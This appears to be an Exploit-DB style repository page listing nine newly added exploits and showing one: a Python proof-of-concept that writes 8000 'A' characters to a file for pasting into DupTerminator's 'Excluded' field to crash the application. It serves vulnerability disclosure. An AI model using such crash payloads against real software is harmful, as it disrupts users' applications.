44903d83c7
9 changes to exploits/shellcodes DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Veyon 4.4.1 - 'VeyonService' Unquoted Service Path LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) ProjeQtOr Project Management 9.1.4 - Remote Code Execution Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated) CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) CHIYU TCP/IP Converter devices - CRLF injection Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
27 lines
No EOL
739 B
Python
Executable file
27 lines
No EOL
739 B
Python
Executable file
# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
|
|
# Date: 2021-05-28
|
|
# Author: Brian Rodríguez
|
|
# Software Site: https://sourceforge.net/projects/dupterminator/
|
|
# Version: 1.4.5639.37199
|
|
# Category: DoS (Windows)
|
|
|
|
##### Vulnerability #####
|
|
|
|
DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.
|
|
|
|
Successful exploitation will causes application stop working.
|
|
|
|
I have been able to test this exploit against Windows 10.
|
|
|
|
##### PoC #####
|
|
|
|
#!/usr/bin/env python
|
|
buffer = "\x41" * 8000
|
|
|
|
try:
|
|
f = open("payload.txt","w")
|
|
f.write(buffer)
|
|
f.close()
|
|
print ("File created")
|
|
except:
|
|
print ("File cannot be created") |